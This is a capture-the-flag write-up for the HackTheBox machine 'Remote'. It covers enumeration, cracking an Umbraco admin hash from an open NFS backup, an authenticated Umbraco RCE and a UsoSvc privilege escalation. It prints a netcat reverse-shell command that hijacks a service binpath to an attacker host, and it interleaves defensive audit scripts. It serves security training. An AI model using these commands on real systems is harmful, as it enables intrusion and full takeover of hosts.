Remote 10.10.10.180
It doesn't matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down. <Roy T. Bennett>
Competed on 30 May 2020

Background

Remote is a Windows machine from HackTheBox that focuses on the CVE exploitation technique, for training your ethical hacking and penetration testing skills.
According to the nmap result, a website running a vulnerable version of Umbraco CMS is found, and a mountd/NFS service is enabled. The Umbraco instance can be exploited once credentials are recovered from an exposed NFS share: a file stored on that share contains a login credential that can be used to log into Umbraco CMS, and an authenticated Umbraco CMS exploit then gives initial access.
Based on the winPEAS result, there is a possible local privilege escalation vector through a service named UsoSvc to which we have full access. Modifying the service's binpath returns a reverse shell with administrator privileges.
Target Machine: 10.10.10.180
Attacker Machine: 10.10.14.8

Hacking Process Part 0 – Service Reconnaissance

Quick Pre-searching

nmap -Pn -p- -T5 --min-rate=1000 10.10.10.180 -oG fkclai.nmap

Detailed Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.192 -o nmap-result.txt

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 17:49 IST
Nmap scan report for 10.10.10.180
Host is up (0.21s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m09s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-06T12:21:19
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.81 seconds

Enumeration strategies

According to the nmap result, the following interesting ports are found for further investigation:
    1. FTP (21)
    2. Website (80)
    3. NFS (2049)

Hacking Process Part 1 – Enumeration

FTP - 21

Logging in to the FTP service with the credentials anonymous/anonymous is successful, but nothing can be found or downloaded from this account.

Website - 80

Going to the website, no interesting items can be found. Using gobuster to check for any hidden folder/subdirectory, a list of interesting
gobuster dir --url=http://10.10.10.180/ --wordlist=/usr/share/wordlists/dirb/common.txt
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 10 | Wordlist size: 4614 | Request count: 4614

Error Log: /opt/dirsearch/logs/errors-20-09-06_17-53-02.log

Target: http://10.10.10.180

Output File: /opt/dirsearch/reports/10.10.10.180/20-09-06_17-53-02

[17:53:02] Starting:
[17:53:08] 200 - 7KB - /
[17:53:18] 200 - 5KB - /about-us
[17:53:25] 200 - 5KB - /blog
[17:53:25] 200 - 5KB - /Blog
[17:53:34] 200 - 8KB - /contact
[17:53:34] 200 - 8KB - /Contact
[17:53:56] 200 - 7KB - /home
[17:53:56] 200 - 7KB - /Home
[17:54:00] 302 - 126B - /install -> /umbraco/
[17:54:01] 200 - 3KB - /intranet
[17:54:10] 500 - 3KB - /master
[17:54:21] 200 - 7KB - /people
[17:54:21] 200 - 7KB - /People
[17:54:23] 200 - 3KB - /person
[17:54:28] 500 - 3KB - /product
[17:54:28] 200 - 5KB - /products
[17:54:28] 200 - 5KB - /Products
[17:54:55] 200 - 4KB - /umbraco
An administrative page is found, but we cannot log into the system using default accounts such as admin/admin. Move on to the next service for further checking.

NFS - 2049

Use the showmount tool to check which NFS shares are accessible, and by whom.
The site_backups share is available to mount and is accessible to everyone, so let's mount it and enumerate further.
Checking the folders one by one, a file named Umbraco.sdf is found inside the folder /App_Data, which contains credentials at the top of the file.
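The "accessible to everyone" condition above is the finding a defender wants to catch before an attacker does. The following is an added audit example, not code from the original write-up: it parses the text that `showmount -e <host>` prints (the format is assumed; the sample export list below is constructed, not captured from the box) and flags exports that any host may mount, with extra weight on names that suggest backups or configuration.

```python
from typing import Dict, List, Tuple

# Constructed sample of `showmount -e <host>` output (assumed format; not
# captured from the box): one export per line, followed by the client list.
SAMPLE_SHOWMOUNT = """Export list for 10.10.10.180:
/site_backups (everyone)
/finance      10.10.10.0/24,backup01.corp.local
/public       *
"""

# Client specifications that mean "any host may mount this export".
WORLD_SPECS = {"(everyone)", "*"}

# Export names that hint at high-value content (backups, configuration, databases).
SENSITIVE_HINTS = ("backup", "config", "db", "data")


def parse_showmount(text: str) -> Dict[str, List[str]]:
    """Map each exported path to the list of client specs allowed to mount it."""
    exports: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1].split(",") if len(parts) > 1 else []
        exports[path] = [c.strip() for c in clients if c.strip()]
    return exports


def audit_exports(text: str) -> List[Tuple[str, str]]:
    """Return (path, reason) findings for exports that need attention."""
    findings = []
    for path, clients in parse_showmount(text).items():
        world = any(c in WORLD_SPECS for c in clients)
        sensitive = any(h in path.lower() for h in SENSITIVE_HINTS)
        if world and sensitive:
            findings.append((path, "world-mountable export with sensitive-looking name"))
        elif world:
            findings.append((path, "world-mountable export"))
        elif not clients:
            findings.append((path, "no client restriction listed"))
    return findings


if __name__ == "__main__":
    for path, reason in audit_exports(SAMPLE_SHOWMOUNT):
        print(f"{path}: {reason}")
```

Run against real output (`showmount -e host | python3 audit.py` with a small `sys.stdin.read()` wrapper), the first finding is the one this box exhibits: a backup share exported to everyone. The fix on the server side is to restrict the export to the hosts that need it and, for backups, to keep them off network shares entirely.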
strings Umbraco.sdf | head
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
Crack the password whose SHA1 hash is b8be16afba8c314ad33d812f22a04991b90e2aaa using an online hash lookup service. Finally, we get the credentials user id: [email protected] and password baconandcheese.
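The reason the hash above falls to an online lookup is that it is a bare SHA1 digest with no salt: the same password always yields the same 40 hex characters, so a precomputed table resolves it. As an added example (not code from the write-up or from Umbraco), the block below parses the `{"hashAlgorithm":"SHA1"}` descriptor format seen in the strings output, classifies such records as weak in a password-storage review, and shows the salted, iterated PBKDF2 form that a lookup table cannot attack. The assumption that the digest is unsalted SHA1 follows from the page's own result (an online service resolved it); the record string is copied from the page, the PBKDF2 parameters and output format are choices made for this example.

```python
import hashlib
import hmac
import os
import re
from typing import Optional, Tuple

# A record copied from the strings output above: the 40-hex-character digest sits
# directly in front of the JSON descriptor that names the algorithm.
PAGE_RECORD = (
    'Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa'
    '{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d'
)

RECORD_RE = re.compile(r'([0-9a-fA-F]{40})\{"hashAlgorithm":"([^"]+)"\}')

# Fast digests that, stored in this form, carry no salt.
WEAK_ALGORITHMS = {"SHA1", "MD5"}

PBKDF2_ITERATIONS = 600_000  # chosen for this example; tune to your hardware budget


def parse_record(record: str) -> Optional[Tuple[str, str]]:
    """Return (hex_digest, algorithm_name) or None when no descriptor is present."""
    m = RECORD_RE.search(record)
    return (m.group(1).lower(), m.group(2)) if m else None


def legacy_sha1(password: str) -> str:
    """Unsalted SHA1 hex digest: the form the page's hash is assumed to be in
    (it resolved in an online lookup, which only works without a salt)."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def audit_record(record: str) -> str:
    """Classify one stored credential record for a password-storage review."""
    parsed = parse_record(record)
    if parsed is None:
        return "UNKNOWN: no hash descriptor found"
    digest, algorithm = parsed
    if algorithm.upper() in WEAK_ALGORITHMS:
        return f"WEAK: unsalted {algorithm} digest {digest[:8]}... is lookup-table crackable"
    return f"OK: {algorithm}"


def pbkdf2_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated hash in a self-describing 'pbkdf2_sha256$iter$salt$hash' string."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, dk_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(audit_record(PAGE_RECORD))
    # Same password twice: identical legacy digests, but distinct PBKDF2 strings.
    print(legacy_sha1("Winter2020!") == legacy_sha1("Winter2020!"))   # True
    print(pbkdf2_hash("Winter2020!") == pbkdf2_hash("Winter2020!"))   # False
```

The two prints at the end are the whole argument: with unsalted SHA1, two accounts sharing a password share a digest, and one lookup answers both; with a per-user random salt and a high iteration count, each stored value is unique and every guess costs the attacker the full PBKDF2 work.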

Hacking Process Part 2 – Initial Low Privilege Access

Let's log in to Umbraco CMS with the credentials found: [email protected] / baconandcheese.
The version is checked to be Umbraco 7.12.4; googling for vulnerabilities finds one on Exploit-DB.
This version suffers from an authenticated remote code execution vulnerability. Download the exploit and modify the login details as below.
...
password="baconandcheese";
host = "http://10.10.10.180";
...
In order to get the reverse TCP shell, the payload is changed to download a 64-bit Windows build of netcat.
Next, stand up a listener on port 80 and run the exploit.
Change the payload again to start the reverse TCP shell to my Kali machine.
Start the listening port on my Kali machine, and the reverse shell is returned.
The user flag can be found in the C:\Users\Public folder.

Hacking Process Part 3 – Privilege Escalation

Start by gathering the system information:
whoami /priv
systeminfo
The result of winPEAS.exe, which discovers possible local privilege escalation vectors, shows full access to a service named UsoSvc:
[+] Modifiable Services
[?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
UsoSvc: AllAccess, Start
Because of the full access to the UsoSvc service, we can modify the service's binpath so that it pops us a reverse shell.
sc.exe stop UsoSvc
sc config UsoSvc binpath= "C:\windows\temp\nc.exe -nv 10.10.14.6 1235 -e C:\WINDOWS\System32\cmd.exe"
sc.exe qc usosvc
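What winPEAS reported as "AllAccess" is a service DACL that grants SERVICE_CHANGE_CONFIG (the right `sc config binpath=` needs) to a trustee that is not SYSTEM or Administrators. The following is an added audit example, not code from the write-up or from winPEAS: it parses the SDDL string that `sc.exe sdshow <service>` prints and reports every allow-ACE that gives a non-privileged trustee a right capable of reconfiguring or taking over the service. The two descriptors are constructed for the example (the first is shaped like a normal default, the second reproduces the weak condition); the right-code bit values are the documented Win32 service access masks. Note that `WD` means WRITE_DAC in the rights field but Everyone in the trustee field; the parser tells them apart by position.

```python
import re
from typing import List, Tuple

# Bit values of the SDDL right codes as they apply to service objects
# (SERVICE_* access rights plus the standard and generic bits).
RIGHT_BITS = {
    "CC": 0x00000001,  # SERVICE_QUERY_CONFIG
    "DC": 0x00000002,  # SERVICE_CHANGE_CONFIG (what `sc config binpath=` needs)
    "LC": 0x00000004,  # SERVICE_QUERY_STATUS
    "SW": 0x00000008,  # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x00000010,  # SERVICE_START
    "WP": 0x00000020,  # SERVICE_STOP
    "DT": 0x00000040,  # SERVICE_PAUSE_CONTINUE
    "LO": 0x00000080,  # SERVICE_INTERROGATE
    "CR": 0x00000100,  # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x00010000,  # DELETE
    "RC": 0x00020000,  # READ_CONTROL
    "WD": 0x00040000,  # WRITE_DAC
    "WO": 0x00080000,  # WRITE_OWNER
    "GA": 0x10000000,  # GENERIC_ALL
    "GW": 0x40000000,  # GENERIC_WRITE (maps onto SERVICE_CHANGE_CONFIG)
}
# Rights that let the holder reconfigure or take over the service.
DANGEROUS = {"DC", "WD", "WO", "GW", "GA", "FA"}
# Trustees expected to hold such rights: Local System and Builtin Administrators.
PRIVILEGED_SIDS = {"SY", "BA"}

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def expand_rights(field: str) -> List[str]:
    """Turn an ACE rights field (two-letter codes or a hex mask) into a code list."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return [code for code, bit in RIGHT_BITS.items() if mask & bit]
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_dacl(sddl: str) -> List[Tuple[str, str, List[str]]]:
    """Return (ace_type, trustee, rights) for each ACE in the DACL section only."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for ace in ACE_RE.findall(m.group(1)):
        fields = ace.split(";")  # type;flags;rights;object;inherit_object;trustee
        if len(fields) < 6:
            continue  # malformed or unsupported ACE form
        aces.append((fields[0], fields[5], expand_rights(fields[2])))
    return aces


def find_weak_aces(sddl: str) -> List[Tuple[str, List[str]]]:
    """List (trustee, dangerous_rights) for allow-ACEs given to non-privileged trustees."""
    findings = []
    for ace_type, trustee, rights in parse_dacl(sddl):
        if ace_type != "A" or trustee in PRIVILEGED_SIDS:
            continue  # deny ACEs grant nothing; admins are expected to hold these rights
        risky = sorted(r for r in rights if r in DANGEROUS)
        if risky:
            findings.append((trustee, risky))
    return findings


# Constructed descriptors in the shape `sc.exe sdshow <service>` prints (not from the box).
# Expected: only SY and BA may change configuration; IU/SU can only query.
EXPECTED_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)
# Weakened: Authenticated Users (AU) hold the same rights as Administrators,
# which is the "AllAccess" condition winPEAS reported above.
WEAK_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)"
)

if __name__ == "__main__":
    for name, sddl in (("expected", EXPECTED_SDDL), ("weak", WEAK_SDDL)):
        print(name, find_weak_aces(sddl) or "no findings")
```

Feeding every installed service's `sc.exe sdshow` output through `find_weak_aces` gives a host-wide list of services a standard user could repurpose. On the detection side, `sc config binpath=` ultimately rewrites the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name>, so registry value-set monitoring on that key catches the technique even when the ACL audit was missed.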

Recommendation

Several known vulnerabilities are found on this box, which let us finish the game easily. This tells us that system patching is the most important preventive action to defend against cyber attacks.

Reference Link

PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ng